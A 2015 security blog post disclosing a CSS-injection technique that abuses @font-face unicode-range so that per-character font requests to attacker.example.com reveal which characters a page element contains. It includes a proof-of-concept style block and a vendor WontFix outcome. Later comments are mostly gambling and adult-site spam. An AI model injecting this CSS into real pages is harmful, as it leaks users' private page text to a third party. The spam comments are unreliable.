Friday, October 23, 2015

CSS based Attack: Abusing unicode-range of @font-face

In this post, I would like to share about new CSS based attack with unicode-range descriptor of @font-face rule.

Using this technique, an attacker can read page's text partially by CSS only.
An attacker might use this technique in the following cases:

- Browser's XSS filter bypass (e.g. XSS Auditor does not block <style> injection)
- Only CSS injection is allowed in the target page

As far as I know, known CSS based attack can read attribute (See Attribute Reader: http://p42.us/css/) but can't read characters of text node. This vector can do it, not perfect though :)

So far, this vector can be used in Chrome and Firefox Nightly 44.

Let's go:

<style>
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
}
#sensitive-information{
font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>

When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".

Let's see another example: http://vulnerabledoma.in/poc_unicode-range2.html

You can see external requests including page text (M,a,s,t,o,K,i,n,u,g,w) from DevTools. Like the following:



As you can see, we can't know duplicated characters. But in some cases like this PoC, I think that it can give an attacker enough information.

I reported this trick to Chrome Team but it has been marked WontFix on Issue 543078.

It seems that this behavior is spec'd. See EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/#composite-fonts.  Due to this behavior, users can save bandwidth. But as the side effect, an attacker got new attack vector.

11 comments:

  1. This is a really interesting way to exploit that the browser will go through all specified fonts, even if it's a houndred and none exists, it's still a request made.

    ReplyDelete
  2. You can easily use that for input fields, except the password type...

    ReplyDelete
  3. any work-around to make duplicated characters work?

    ReplyDelete
  4. It could be possible to figure out character combinations using ligatures. I'm not sure if it's possible to make the requests to remote server for ligatures other than those defined as separate characters in UNICODE (in practice, only ff, ffi, fi).

    Custom font could be used to make all character combinations different width or height and somehow try to leak the width or height of the element to remote server.

    ReplyDelete
  5. I don’t know whether it’s just me or if perhaps everyone else experiencing problems with your blog.
    섯다

    ReplyDelete
  6. It looks like some of the text within your posts are running off the screen. Can someone else please provide feedback and let me know if this is happening to them as well?
    This may be a issue with my browser because I’ve had
    this happen previously. Cheers!
    스포츠토토

    ReplyDelete
  7. Great writing to see, glad that google brought me here, Keep Up cool job!
    If you are going for best contents like I do, simply go to see this website all the time as it provides feature contents, thanks
    한국야동

    ReplyDelete
  8. 토토
    프로토
    안전놀이터

    Great write-up, I am a big believer in commenting on blogs to inform the blog writers know that they’ve added something worthwhile to the world wide web!..

    ReplyDelete
  9. 스포츠중계
    스포츠토토티비
    토토사이트

    I would love to visit this website every day. As this promotes eternal knowledge.

    ReplyDelete
  10. 토토
    배트맨토토
    먹튀검증

    Your article has proven very informative and very useful to me. It was very obvious that you are much knowledgeable in this area.

    ReplyDelete